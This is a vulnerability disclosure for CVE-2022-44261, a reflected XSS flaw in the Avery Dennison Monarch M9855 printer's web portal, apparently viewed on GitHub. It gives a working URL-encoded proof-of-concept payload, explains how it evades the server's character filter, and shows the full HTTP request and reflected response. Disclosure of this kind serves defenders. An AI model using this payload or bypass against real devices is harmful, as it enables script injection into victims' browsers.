Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
AveryDennison/AveryDennison_MonarchM9855_XSS/AveryDennison_MonarchM9855_XSS_CVE-2022-44261.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
38 lines (26 sloc)
1.7 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Reflected XSS (Cross-Site Scripting) attack - CVE-2022-44261 | |
| ------------------------------------------------------------ | |
| Vendor: Avery Dennison | |
| Print Model: Monarch M9855 | |
| Software Version: Monarch 7411 Print Adapter, Firmware Ver. CAMO-7.68 (2011.06.02), Boot Ver. 7.3 | |
| Type: Unauthenticated Remote attack | |
| We have identified that the web portal of "Monarch M9855" printer device product is vulnerable to Reflective Cross-Site Scripting (XSS). This is due to that the Web App fails to adequately sanitize malicious strings. By leveraging this issue, an attacker is able to cause arbitrary HTML and JavaScript code to be executed in a user's browser within the security context of the affected site. This attack can be used in conjunction with a social engineering techniques. | |
| We have managed to bypass the server-side protection since the back-end does not allow the "\" character. Also, the Space character should be URL encoded. Therefore, we crafted a URL encoded payload that didn't contain the "\" character. | |
| Below, evidence is provided. | |
| Request: | |
| GET /%3Cimg%20src%3Dx%20onerror%3Dalert%28%22XSSbyIthacaLabs%22%29%3E HTTP/1.1 | |
| Host: 1.1.1.1 | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | |
| Accept-Language: en-US,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| DNT: 1 | |
| Connection: close | |
| Upgrade-Insecure-Requests: 1 | |
| Pragma: no-cache | |
| Cache-Control: no-cache | |
| Response: | |
| HTTP/1.0 200 Document follows | |
| Server: XCD WebAdmin | |
| Content-Type: text/html | |
| <html><head><title> ERROR 404</title></head><body><center> FILE /<img src=x onerror=alert("XSSbyIthacaLabs")> NOT FOUND, ERROR 404</center></body></html> |